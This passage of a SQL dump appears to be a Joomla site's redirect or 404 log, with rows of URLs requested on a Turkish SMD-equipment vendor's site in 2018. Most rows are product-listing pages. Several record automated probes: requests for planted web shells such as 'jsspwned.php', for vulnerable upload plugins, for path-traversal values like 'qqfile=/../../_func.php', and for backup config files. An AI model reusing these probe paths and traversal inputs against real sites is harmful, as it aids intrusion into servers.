00:00:00',301),(20790,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,product_name/results,1-50',NULL,'','',1,0,'2018-08-13 12:53:13','0000-00-00 00:00:00',301),(20791,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,product_name/results,1-50',NULL,'','',1,0,'2018-08-13 15:14:15','0000-00-00 00:00:00',301),(20792,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,product_name/results,1-10',NULL,'','',1,0,'2018-08-13 15:14:51','0000-00-00 00:00:00',301),(20793,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_sku/results,1-5',NULL,'','',1,0,'2018-08-13 19:02:04','0000-00-00 00:00:00',301),(20794,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/results,1-50',NULL,'','',2,0,'2018-08-13 19:02:33','0000-00-00 00:00:00',301),(20795,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,ordering/results,1-50',NULL,'','',2,0,'2018-08-13 19:03:03','0000-00-00 00:00:00',301),(20796,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_sku/results,1-20',NULL,'','',1,0,'2018-08-13 19:03:30','0000-00-00 00:00:00',301),(20797,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_sku/results,1-10',NULL,'','',1,0,'2018-08-13 19:04:33','0000-00-00 00:00:00',301),(20798,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',1,0,'2018-08-13 19:05:41','0000-00-00 00:00:00',301),(20799,'http://www.3s-technologies.com.tr/tr/cfg-contactform/inc/upload.php',NULL,'','',1,0,'2018-08-13 21:15:39','0000-00-00 00:00:00',301),(20800,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/cfg-contactform/inc/upload.php',NULL,'','',1,0,'2018-08-13 21:15:40','0000-00-00 00:00:00',301),(20801,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,product_sku/results,1-5',NULL,'','',2,0,'2018-08-13 21:36:50','0000-00-00 00:00:00',301),(20802,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,product_sku/results,1-50',NULL,'','',1,0,'2018-08-13 21:38:17','0000-00-00 00:00:00',301),(20803,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,product_sku/results,1-10',NULL,'','',1,0,'2018-08-13 21:39:51','0000-00-00 00:00:00',301),(20804,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,product_sku/results,6-10?language=en-gb',NULL,'','',1,0,'2018-08-13 22:21:23','0000-00-00 00:00:00',301),(20805,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,mf_name/results,1-5',NULL,'','',1,0,'2018-08-13 22:33:54','0000-00-00 00:00:00',301),(20806,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,category_name/results,1-5',NULL,'','',1,0,'2018-08-13 22:37:35','0000-00-00 00:00:00',301),(20807,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,product_sku/results,1-5',NULL,'','',5,0,'2018-08-14 05:25:15','0000-00-00 00:00:00',301),(20808,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,product_sku/results,1-50',NULL,'','',1,0,'2018-08-14 05:25:28','0000-00-00 00:00:00',301),(20809,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_sku/results,6-25?language=en-gb',NULL,'','',11,0,'2018-08-14 06:37:32','0000-00-00 00:00:00',301),(20810,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,ordering/results,6-25?language=en-gb',NULL,'','',4,0,'2018-08-14 06:39:34','0000-00-00 00:00:00',301),(20811,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,category_name/results,6-25?language=en-gb',NULL,'','',1,0,'2018-08-14 08:06:18','0000-00-00 00:00:00',301),(20812,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,ordering/results,6-10?language=en-gb',NULL,'','',1,0,'2018-08-14 08:06:23','0000-00-00 00:00:00',301),(20813,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,category_name/results,6-10?language=en-gb',NULL,'','',1,0,'2018-08-14 08:06:34','0000-00-00 00:00:00',301),(20814,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,mf_name/results,6-10?language=en-gb',NULL,'','',1,0,'2018-08-14 08:06:41','0000-00-00 00:00:00',301),(20815,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,category_name/results,6-15?language=en-gb',NULL,'','',1,0,'2018-08-14 08:06:57','0000-00-00 00:00:00',301),(20816,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,category_name/results,6-10',NULL,'','',1,0,'2018-08-14 08:07:07','0000-00-00 00:00:00',301),(20817,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,ordering/results,1-10',NULL,'','',1,0,'2018-08-14 12:33:07','0000-00-00 00:00:00',301),(20818,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,product_name/results,1-10',NULL,'','',2,0,'2018-08-14 12:33:34','0000-00-00 00:00:00',301),(20819,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,category_name/results,1-10',NULL,'','',1,0,'2018-08-14 12:33:44','0000-00-00 00:00:00',301),(20820,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/results,1-10',NULL,'','',1,0,'2018-08-14 12:34:01','0000-00-00 00:00:00',301),(20821,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,product_name/results,1-20',NULL,'','',2,0,'2018-08-14 12:34:21','0000-00-00 00:00:00',301),(20822,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,product_name/results,1-10',NULL,'','',1,0,'2018-08-14 12:34:40','0000-00-00 00:00:00',301),(20823,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,product_name/results,1-50',NULL,'','',1,0,'2018-08-14 12:35:00','0000-00-00 00:00:00',301),(20824,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-08-14 12:35:21','0000-00-00 00:00:00',301),(20825,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,product_name/results,1-10',NULL,'','',1,0,'2018-08-14 12:35:44','0000-00-00 00:00:00',301),(20826,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,ordering',NULL,'','',5,0,'2018-08-14 13:50:50','0000-00-00 00:00:00',301),(20827,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,ordering/results,6-15?language=en-gb',NULL,'','',5,0,'2018-08-14 17:37:54','0000-00-00 00:00:00',301),(20828,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/dirdesc/results,6-10?language=en-gb',NULL,'','',1,0,'2018-08-14 17:38:48','0000-00-00 00:00:00',301),(20829,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_sku/results,6-15?language=en-gb',NULL,'','',13,0,'2018-08-14 17:39:16','0000-00-00 00:00:00',301),(20830,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/results,6-15?language=en-gb',NULL,'','',1,0,'2018-08-14 17:39:44','0000-00-00 00:00:00',301),(20831,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/dirdesc/results,6-25?language=en-gb',NULL,'','',1,0,'2018-08-14 17:40:13','0000-00-00 00:00:00',301),(20832,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/dirdesc/results,6-55?language=en-gb',NULL,'','',1,0,'2018-08-14 17:40:40','0000-00-00 00:00:00',301),(20833,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,category_name/results,1-5',NULL,'','',1,0,'2018-08-14 17:54:24','0000-00-00 00:00:00',301),(20834,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,category_name/results,1-50',NULL,'','',1,0,'2018-08-14 17:55:03','0000-00-00 00:00:00',301),(20835,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,category_name/results,1-10',NULL,'','',1,0,'2018-08-14 17:55:21','0000-00-00 00:00:00',301),(20836,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,product_sku/results,1-10',NULL,'','',1,0,'2018-08-14 18:13:01','0000-00-00 00:00:00',301),(20837,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2018-08-14 18:13:32','0000-00-00 00:00:00',301),(20838,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku',NULL,'','',4,0,'2018-08-14 18:15:05','0000-00-00 00:00:00',301),(20839,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_sku/results,1-50',NULL,'','',1,0,'2018-08-14 20:34:08','0000-00-00 00:00:00',301),(20840,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,product_sku/results,1-50',NULL,'','',1,0,'2018-08-14 23:30:31','0000-00-00 00:00:00',301),(20841,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,ordering/results,1-10?language=en-gb',NULL,'','',1,0,'2018-08-15 00:25:31','0000-00-00 00:00:00',301),(20842,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2018-08-15 00:25:33','0000-00-00 00:00:00',301),(20843,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/results,1-10?language=en-gb',NULL,'','',1,0,'2018-08-15 00:25:36','0000-00-00 00:00:00',301),(20844,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,product_sku/results,1-10',NULL,'','',2,0,'2018-08-15 12:14:16','0000-00-00 00:00:00',301),(20845,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,product_name/results,1-10',NULL,'','',2,0,'2018-08-15 12:14:41','0000-00-00 00:00:00',301),(20846,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,category_name/results,1-10',NULL,'','',2,0,'2018-08-15 12:15:06','0000-00-00 00:00:00',301),(20847,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/results,1-10',NULL,'','',1,0,'2018-08-15 13:29:03','0000-00-00 00:00:00',301),(20848,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,category_name/results,1-5',NULL,'','',1,0,'2018-08-15 14:08:31','0000-00-00 00:00:00',301),(20849,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2018-08-15 16:03:31','0000-00-00 00:00:00',301),(20850,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/dirdesc/results,1-20?language=en-gb',NULL,'','',1,0,'2018-08-15 16:03:55','0000-00-00 00:00:00',301),(20851,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/dirdesc/results,1-10?language=en-gb',NULL,'','',1,0,'2018-08-15 16:04:43','0000-00-00 00:00:00',301),(20852,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/dirdesc/results,1-50',NULL,'','',3,0,'2018-08-15 16:05:23','0000-00-00 00:00:00',301),(20853,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_sku/results,1-10?language=en-gb',NULL,'','',1,0,'2018-08-15 20:05:00','0000-00-00 00:00:00',301),(20854,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name/results,1-10?language=en-gb',NULL,'','',1,0,'2018-08-15 20:05:10','0000-00-00 00:00:00',301),(20855,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',1,0,'2018-08-16 00:08:19','0000-00-00 00:00:00',301),(20856,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,ordering/results,1-10',NULL,'','',1,0,'2018-08-16 00:09:28','0000-00-00 00:00:00',301),(20857,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_sku/results,1-20',NULL,'','',1,0,'2018-08-16 00:10:13','0000-00-00 00:00:00',301),(20858,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/dirdesc/results,1-5',NULL,'','',4,0,'2018-08-16 04:46:42','0000-00-00 00:00:00',301),(20859,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/results,1-5',NULL,'','',10,0,'2018-08-16 04:47:34','0000-00-00 00:00:00',301),(20860,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,ordering/results,1-5',NULL,'','',1,0,'2018-08-16 04:48:06','0000-00-00 00:00:00',301),(20861,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/dirdesc/results,1-10',NULL,'','',2,0,'2018-08-16 04:48:47','0000-00-00 00:00:00',301),(20862,'http://3s-technologies.com.tr/tr/components/rxr_1534391927.php',NULL,'','',1,0,'2018-08-16 06:02:24','0000-00-00 00:00:00',301),(20863,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/by,mf_name/results,1-50',NULL,'','',1,0,'2018-08-16 08:38:21','0000-00-00 00:00:00',301),(20864,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/by,mf_name/dirdesc',NULL,'','',1,0,'2018-08-16 08:40:12','0000-00-00 00:00:00',301),(20865,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,category_name/results,1-10',NULL,'','',2,0,'2018-08-17 06:49:36','0000-00-00 00:00:00',301),(20866,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,product_name/results,1-10',NULL,'','',2,0,'2018-08-17 06:49:42','0000-00-00 00:00:00',301),(20867,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,mf_name/dirdesc/results,1-5',NULL,'','',2,0,'2018-08-17 06:50:09','0000-00-00 00:00:00',301),(20868,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,product_sku/results,1-10',NULL,'','',2,0,'2018-08-17 06:50:18','0000-00-00 00:00:00',301),(20869,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,mf_name/dirdesc/results,1-20',NULL,'','',2,0,'2018-08-17 06:50:27','0000-00-00 00:00:00',301),(20870,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,mf_name/dirdesc/results,1-50',NULL,'','',2,0,'2018-08-17 06:50:38','0000-00-00 00:00:00',301),(20871,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name/results,1-50',NULL,'','',1,0,'2018-08-18 14:02:11','0000-00-00 00:00:00',301),(20872,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,ordering/results,1-50',NULL,'','',1,0,'2018-08-18 14:02:32','0000-00-00 00:00:00',301),(20873,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2018-08-18 14:02:52','0000-00-00 00:00:00',301),(20874,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2018-08-18 14:03:32','0000-00-00 00:00:00',301),(20875,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/results,1-5',NULL,'','',1,0,'2018-08-18 14:04:36','0000-00-00 00:00:00',301),(20876,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',2,0,'2018-08-18 14:04:58','0000-00-00 00:00:00',301),(20877,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2018-08-18 14:05:23','0000-00-00 00:00:00',301),(20878,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/manufacturer/resized/logo-panasonic6_150x150.jpg',NULL,'','',2,0,'2018-08-18 21:46:21','0000-00-00 00:00:00',301),(20879,'https://3s-technologies.com.tr/graphql',NULL,'','',21,0,'2018-08-19 01:35:27','0000-00-00 00:00:00',301),(20880,'http://www.3s-technologies.com.tr/tr/index.php/component/users?view=login',NULL,'','',4,0,'2018-08-19 03:33:05','0000-00-00 00:00:00',301),(20881,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-08-19 17:22:57','0000-00-00 00:00:00',301),(20882,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_name/results,1-20',NULL,'','',1,0,'2018-08-19 17:23:50','0000-00-00 00:00:00',301),(20883,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_name/results,1-40',NULL,'','',2,0,'2018-08-19 17:25:02','0000-00-00 00:00:00',301),(20884,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,ordering/results,1-5?language=en-gb',NULL,'','',5,0,'2018-08-19 17:55:33','0000-00-00 00:00:00',301),(20885,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,ordering/results,6-10',NULL,'','',15,0,'2018-08-19 17:55:59','0000-00-00 00:00:00',301),(20886,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,pc.ordering,product_name/dirdesc/results,6-10?language=en-gb',NULL,'','',1,0,'2018-08-19 17:58:42','0000-00-00 00:00:00',301),(20887,'http://3s-technologies.com.tr/tr/administrator/components/com_xcloner-backupandrestore/xcloner.php',NULL,'','',1,0,'2018-08-20 04:15:18','0000-00-00 00:00:00',301),(20888,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,ordering/results,1-50',NULL,'','',8,0,'2018-08-20 18:33:49','0000-00-00 00:00:00',301),(20889,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/dirdesc/results,1-50',NULL,'','',6,0,'2018-08-20 18:35:09','0000-00-00 00:00:00',301),(20890,'http://www.3s-technologies.com.tr/tr/s.php',NULL,'','',13,0,'2018-08-23 10:55:24','0000-00-00 00:00:00',301),(20891,'http://3s-technologies.com.tr/tr/missok.php?x=1',NULL,'','',4,0,'2018-08-23 12:52:02','0000-00-00 00:00:00',301),(20892,'http://3s-technologies.com.tr/tobey.php',NULL,'','',5,0,'2018-08-23 14:57:51','0000-00-00 00:00:00',301),(20893,'http://3s-technologies.com.tr/tr/wp-mosx.php?x=1',NULL,'','',3,0,'2018-08-23 17:10:35','0000-00-00 00:00:00',301),(20894,'http://3s-technologies.com.tr/pinfon.php',NULL,'','',5,0,'2018-08-23 20:26:11','0000-00-00 00:00:00',301),(20895,'http://3s-technologies.com.tr/tmp.php',NULL,'','',7,0,'2018-08-23 22:12:03','0000-00-00 00:00:00',301),(20896,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/results,1-60',NULL,'','',6,0,'2018-08-24 00:31:31','0000-00-00 00:00:00',301),(20897,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/results,1-30',NULL,'','',11,0,'2018-08-24 00:31:49','0000-00-00 00:00:00',301),(20898,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/results,1-150',NULL,'','',4,0,'2018-08-24 00:33:44','0000-00-00 00:00:00',301),(20899,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/results,1-15',NULL,'','',5,0,'2018-08-24 00:35:06','0000-00-00 00:00:00',301),(20900,'http://3s-technologies.com.tr/wp-sbb.php',NULL,'','',11,0,'2018-08-24 00:53:39','0000-00-00 00:00:00',301),(20901,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-fırın/gf-12-hc-ht-detail',NULL,'','',4,0,'2018-08-24 05:02:14','0000-00-00 00:00:00',301),(20902,'http://3s-technologies.com.tr/tr/configss.php?check=1',NULL,'','',3,0,'2018-08-24 05:30:31','0000-00-00 00:00:00',301),(20903,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&itemid=97&lang=en',NULL,'','',8,0,'2018-08-24 06:33:32','0000-00-00 00:00:00',301),(20904,'http://3s-technologies.com.tr/meniacle/wp-blog-header.php',NULL,'','',4,0,'2018-08-24 07:45:13','0000-00-00 00:00:00',301),(20905,'http://3s-technologies.com.tr/wp-index.php',NULL,'','',4,0,'2018-08-24 09:04:12','0000-00-00 00:00:00',301),(20906,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,mf_name/dirdesc',NULL,'','',6,0,'2018-08-24 14:03:17','0000-00-00 00:00:00',301),(20907,'http://3s-technologies.com.tr/tr/view.php?check=1',NULL,'','',3,0,'2018-08-24 20:40:34','0000-00-00 00:00:00',301),(20908,'http://3s-technologies.com.tr/random.php',NULL,'','',4,0,'2018-08-25 00:09:30','0000-00-00 00:00:00',301),(20909,'http://www.3s-technologies.com.tr/en/wp-content/plugins/viral-optins/api/uploader/file-uploader.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/viral-optins/api/uploader/file-uploader.php','',2,0,'2018-08-25 03:44:42','0000-00-00 00:00:00',301),(20910,'http://3s-technologies.com.tr/news.php',NULL,'','',3,0,'2018-08-25 06:38:21','0000-00-00 00:00:00',301),(20911,'http://3s-technologies.com.tr/tr/wp-pas.php',NULL,'','',3,0,'2018-08-25 12:58:11','0000-00-00 00:00:00',301),(20912,'http://3s-technologies.com.tr/wp-pols.php',NULL,'','',5,0,'2018-08-25 14:25:00','0000-00-00 00:00:00',301),(20913,'http://3s-technologies.com.tr/wpcache.php?_=1',NULL,'','',5,0,'2018-08-25 18:05:09','0000-00-00 00:00:00',301),(20914,'http://3s-technologies.com.tr/bgeiis.php',NULL,'','',5,0,'2018-08-25 20:44:36','0000-00-00 00:00:00',301),(20915,'http://3s-technologies.com.tr/tr/backup.bak.php',NULL,'','',3,0,'2018-08-25 22:46:47','0000-00-00 00:00:00',301),(20916,'http://3s-technologies.com.tr/tr/wp-config_bak.php?x=1',NULL,'','',3,0,'2018-08-26 03:25:24','0000-00-00 00:00:00',301),(20917,'http://3s-technologies.com.tr/post.php',NULL,'','',4,0,'2018-08-26 06:50:02','0000-00-00 00:00:00',301),(20918,'http://3s-technologies.com.tr/yjh.php',NULL,'','',6,0,'2018-08-26 07:47:24','0000-00-00 00:00:00',301),(20919,'http://3s-technologies.com.tr/iontrol.php',NULL,'','',6,0,'2018-08-26 12:44:38','0000-00-00 00:00:00',301),(20920,'http://3s-technologies.com.tr/tong.php?login=kmufg',NULL,'','',6,0,'2018-08-26 15:59:44','0000-00-00 00:00:00',301),(20921,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85&itemid=97&lang=en',NULL,'','',1,0,'2018-08-26 17:27:38','0000-00-00 00:00:00',301),(20922,'http://3s-technologies.com.tr/db_z.php',NULL,'','',6,0,'2018-08-26 17:36:43','0000-00-00 00:00:00',301),(20923,'http://3s-technologies.com.tr/imdex.php',NULL,'','',5,0,'2018-08-26 19:17:01','0000-00-00 00:00:00',301),(20924,'http://3s-technologies.com.tr/tr/jsspwned.php',NULL,'','',46,0,'2018-08-26 19:56:40','0000-00-00 00:00:00',301),(20925,'http://3s-technologies.com.tr/tr/tmp/plupload/jsspwned.php',NULL,'','',89,0,'2018-08-26 19:56:47','0000-00-00 00:00:00',301),(20926,'http://3s-technologies.com.tr/tr/tmp/plupload/jsspwned.phtml',NULL,'','',45,0,'2018-08-26 19:56:49','0000-00-00 00:00:00',301),(20927,'http://3s-technologies.com.tr/tr/images/stories/jsspwned.php',NULL,'','',43,0,'2018-08-26 19:56:51','0000-00-00 00:00:00',301),(20928,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/jsspwned.php',NULL,'','',24,0,'2018-08-26 19:56:55','0000-00-00 00:00:00',301),(20929,'http://3s-technologies.com.tr/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',22,0,'2018-08-26 19:56:55','0000-00-00 00:00:00',301),(20930,'http://3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload/server/php/files/jsspwned.php',NULL,'','',23,0,'2018-08-26 19:56:56','0000-00-00 00:00:00',301),(20931,'http://3s-technologies.com.tr/tr/images/jsspwneed.png',NULL,'','',22,0,'2018-08-26 19:56:58','0000-00-00 00:00:00',301),(20932,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/jsspwned.php3.j',NULL,'','',44,0,'2018-08-26 19:56:59','0000-00-00 00:00:00',301),(20933,'http://3s-technologies.com.tr/tr/images/jsspwned.php',NULL,'','',22,0,'2018-08-26 19:57:02','0000-00-00 00:00:00',301),(20934,'http://3s-technologies.com.tr/tr/jsspwned.html',NULL,'','',22,0,'2018-08-26 19:57:04','0000-00-00 00:00:00',301),(20935,'http://3s-technologies.com.tr/tr/images/jsspwnedx.php',NULL,'','',21,0,'2018-08-26 19:57:07','0000-00-00 00:00:00',301),(20936,'http://3s-technologies.com.tr/tr/tmp/jsspwnedx.php',NULL,'','',21,0,'2018-08-26 19:57:10','0000-00-00 00:00:00',301),(20937,'http://3s-technologies.com.tr/components/com_sexycontactform/fileupload/',NULL,'','',19,0,'2018-08-26 19:57:17','0000-00-00 00:00:00',301),(20938,'http://3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload/files/jsspwned.php',NULL,'','',20,0,'2018-08-26 19:57:20','0000-00-00 00:00:00',301),(20939,'http://3s-technologies.com.tr/components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',19,0,'2018-08-26 19:57:21','0000-00-00 00:00:00',301),(20940,'http://3s-technologies.com.tr/components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',19,0,'2018-08-26 19:57:24','0000-00-00 00:00:00',301),(20941,'http://3s-technologies.com.tr/tr/images/jsspwneed.php',NULL,'','',29,0,'2018-08-26 19:57:33','0000-00-00 00:00:00',301),(20942,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/jsspwned.php',NULL,'','',21,0,'2018-08-26 19:57:36','0000-00-00 00:00:00',301),(20943,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/jsspwned.png',NULL,'','',21,0,'2018-08-26 19:57:37','0000-00-00 00:00:00',301),(20944,'http://3s-technologies.com.tr/rnnvhs.php',NULL,'','',5,0,'2018-08-27 02:35:53','0000-00-00 00:00:00',301),(20945,'http://3s-technologies.com.tr/tr/xattacker.php?x=attacker',NULL,'','',7,0,'2018-08-27 06:26:30','0000-00-00 00:00:00',301),(20946,'http://3s-technologies.com.tr/xmirpc.php?u=1',NULL,'','',5,0,'2018-08-27 07:49:04','0000-00-00 00:00:00',301),(20947,'http://3s-technologies.com.tr/martina.php',NULL,'','',5,0,'2018-08-27 09:51:48','0000-00-00 00:00:00',301),(20948,'http://3s-technologies.com.tr/sizing.php',NULL,'','',6,0,'2018-08-27 12:51:17','0000-00-00 00:00:00',301),(20949,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/3s-technologies.com.tr/joomla/index.php/en/',NULL,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/','',2,0,'2018-08-28 04:25:36','0000-00-00 00:00:00',301),(20950,'http://3s-technologies.com.tr/tr/wp-content/plugins/fluid_forms/file-upload/server/php/',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/fluid_forms/file-upload/server/php/','',1,0,'2018-08-29 13:07:43','0000-00-00 00:00:00',301),(20951,'http://3s-technologies.com.tr/wp-cokd.php',NULL,'','',5,0,'2018-08-29 17:26:24','0000-00-00 00:00:00',301),(20952,'http://3s-technologies.com.tr/forum.php',NULL,'','',5,0,'2018-08-29 19:25:20','0000-00-00 00:00:00',301),(20953,'http://3s-technologies.com.tr/administrator/includes/readmy.php',NULL,'','',4,0,'2018-08-30 00:53:59','0000-00-00 00:00:00',301),(20954,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/by,ordering/results,1-10',NULL,'','',1,0,'2018-08-30 14:04:44','0000-00-00 00:00:00',301),(20955,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2018-08-30 14:04:44','0000-00-00 00:00:00',301),(20956,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/dirdesc/results,1-50',NULL,'','',2,0,'2018-08-30 14:49:32','0000-00-00 00:00:00',301),(20957,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,mf_name/results,1-50',NULL,'','',1,0,'2018-08-30 14:49:39','0000-00-00 00:00:00',301),(20958,'http://3s-technologies.com.tr/keith.php',NULL,'','',5,0,'2018-08-31 